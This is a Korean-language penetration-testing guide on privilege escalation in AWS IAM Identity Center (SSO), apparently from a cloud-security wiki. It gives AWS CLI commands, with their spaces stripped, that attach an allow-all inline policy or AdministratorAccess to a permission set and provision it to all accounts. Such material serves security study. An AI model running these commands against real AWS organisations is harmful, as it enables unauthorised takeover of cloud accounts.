AWS Identity Center / AWS SSO에 대한 자세한 정보는 다음을 확인하세요:
기본적으로 Management Account에서 권한이 있는 사용자만 IAM Identity Center에 접근하고 제어할 수 있습니다.
다른 계정의 사용자는 해당 계정이 Delegated Administrator인 경우에만 허용할 수 있습니다.
자세한 내용은 문서를 확인하세요.
비밀번호 재설정
이와 같은 경우 권한을 상승시키는 쉬운 방법은 사용자의 비밀번호를 재설정할 수 있는 권한을 가지는 것입니다. 불행히도 사용자의 비밀번호를 재설정하기 위해 이메일을 보내는 것만 가능하므로 사용자의 이메일에 접근할 필요가 있습니다.
identitystore:CreateGroupMembership
이 권한을 사용하면 사용자를 그룹에 추가하여 그룹이 가진 모든 권한을 상속받을 수 있습니다.
이 권한을 가진 공격자는 자신의 통제 하에 있는 사용자에게 부여된 권한 세트에 추가 권한을 부여할 수 있습니다.
# Set an inline policy with admin privilegesawssso-adminput-inline-policy-to-permission-set--instance-arn<instance-arn>--permission-set-arn<perm-set-arn>--inline-policyfile:///tmp/policy.yaml# Content of /tmp/policy.yaml{"Version":"2012-10-17","Statement": [{"Sid":"Statement1","Effect":"Allow","Action": ["*"],"Resource": ["*"]}]}# Update the provisioning so the new policy is created in the accountawssso-adminprovision-permission-set--instance-arn<instance-arn>--permission-set-arn<perm-set-arn>--target-typeALL_PROVISIONED_ACCOUNTS
이 권한을 가진 공격자는 자신의 통제 하에 있는 사용자에게 부여된 권한 세트에 추가 권한을 부여할 수 있습니다.
# Set AdministratorAccess policy to the permission setawssso-adminattach-managed-policy-to-permission-set--instance-arn<instance-arn>--permission-set-arn<perm-set-arn>--managed-policy-arn"arn:aws:iam::aws:policy/AdministratorAccess"# Update the provisioning so the new policy is created in the accountawssso-adminprovision-permission-set--instance-arn<instance-arn>--permission-set-arn<perm-set-arn>--target-typeALL_PROVISIONED_ACCOUNTS
이 권한을 가진 공격자는 자신의 통제 하에 있는 사용자에게 부여된 Permission Set에 추가 권한을 부여할 수 있습니다.
이 경우 이러한 권한을 악용하려면 영향을 받을 모든 계정에 있는 고객 관리 정책의 이름을 알아야 합니다.
# Set AdministratorAccess policy to the permission setawssso-adminattach-customer-managed-policy-reference-to-permission-set--instance-arn<instance-arn>--permission-set-arn<perm-set-arn>--customer-managed-policy-reference<customer-managed-policy-name># Update the provisioning so the new policy is created in the accountawssso-adminprovision-permission-set--instance-arn<instance-arn>--permission-set-arn<perm-set-arn>--target-typeALL_PROVISIONED_ACCOUNTS
sso:CreateAccountAssignment
이 권한을 가진 공격자는 자신의 통제 하에 있는 사용자에게 계정에 대한 권한 세트를 부여할 수 있습니다.
